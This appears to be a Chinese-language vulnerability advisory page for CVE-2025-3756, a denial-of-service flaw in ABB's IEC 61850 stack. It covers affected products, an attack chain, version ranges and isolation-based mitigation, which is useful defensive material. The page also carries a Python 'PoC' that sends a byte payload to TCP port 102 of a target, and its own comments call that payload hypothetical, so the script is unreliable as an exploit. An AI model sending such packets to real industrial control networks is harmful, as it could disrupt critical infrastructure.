CVE-2025-3756 CVSS 6.5 中危

CVE-2025-3756 ABB IEC 61850通信栈拒绝服务漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-3756

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ABB AC800M, Symphony Plus SD/MR, S+ Operations

漏洞概述

该漏洞存在于ABB某些产品（如AC800M、Symphony Plus、S+ Operations）集成的IEC 61850通信栈的命令处理逻辑中。攻击者若能访问IEC 61850网络，可发送特制的数据包触发该漏洞。这会导致PM 877、CI850和CI868模块的通信接口进入故障模式，或致使S+ Operations的61850连接不可用，从而造成拒绝服务状态。值得注意的是，此漏洞仅影响61850通信功能，不影响S+ Operations节点的整体可用性。

技术细节

该漏洞源于ABB受影响产品中IEC 61850通信协议栈对特定命令的处理逻辑缺陷。由于攻击向量为邻接（AV:A），攻击者需要接入IEC 61850控制网络。通过构造并发送恶意的IEC 61850协议数据包，攻击者可利用该缺陷导致目标设备（如PM 877, CI850, CI868）的通信服务进程崩溃或异常。攻击无需用户交互（UI:N）且无需认证（PR:N）。虽然漏洞不涉及信息泄露或完整性破坏，但会直接导致通信接口进入故障模式，造成高可用性影响（A:H），中断工业控制系统的正常通信。

攻击链分析

STEP 1

Reconnaissance

攻击者扫描并识别出暴露在IEC 61850网络中的ABB模块（PM 877, CI850等）的IP地址。

STEP 2

Exploitation

攻击者利用无需认证的漏洞，向目标设备的IEC 61850通信端口发送特制的恶意数据包。

STEP 3

Impact

目标设备解析恶意数据包时触发异常，导致通信接口进入故障模式，造成61850通信中断（DoS）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# This is a generic PoC structure for an IEC 61850 DoS.
# Specific packet content (payload) would need to be reverse-engineered
# or obtained from vulnerability disclosure details.

def send_malicious_packet(target_ip, target_port=102):
    try:
        # Create a raw socket or standard TCP socket for IEC 61850 (MMS)
        # IEC 61850 often uses TCP port 102 (MMS) or specific UDP ports for GOOSE/SV.
        # Assuming TCP MMS for this example based on typical stack interactions.
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((target_ip, target_port))

        # Malformed payload designed to trigger the command handling bug
        # The specific byte sequence is hypothetical.
        payload = b"\x03\x00\x00\x1b\x02\xf0\x80\x22\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        
        sock.send(payload)
        print(f"[+] Packet sent to {target_ip}:{target_port}")
        
        # Check for response or timeout (indicating potential crash)
        response = sock.recv(1024)
        print(f"[!] Received response: {response}")

    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    target = "192.168.1.100" # Replace with actual target IP
    send_malicious_packet(target)

影响范围

AC800M (System 800xA): 6.0.0x - 6.0.0303.0

AC800M (System 800xA): 6.1.0x - 6.1.0031.0

AC800M (System 800xA): 6.1.1x - 6.1.1004.0

AC800M (System 800xA): 6.1.1x - 6.1.1202.0

AC800M (System 800xA): 6.2.0x - 6.2.0006.0

Symphony Plus SD Series: A_0, A_1, A_2.003, A_3.005, A_4.001, B_0.005

Symphony Plus MR (Melody Rack): 3.10 - 3.52

S+ Operations: 2.1, 2.2, 2.3, 3.3

防御指南

临时缓解措施

在未应用补丁前，建议通过物理或逻辑隔离措施保护IEC 61850网络，仅允许必要的通信流量。同时，应加强网络监控，一旦发现模块进入故障模式，及时重启设备以恢复服务，并排查是否存在攻击行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表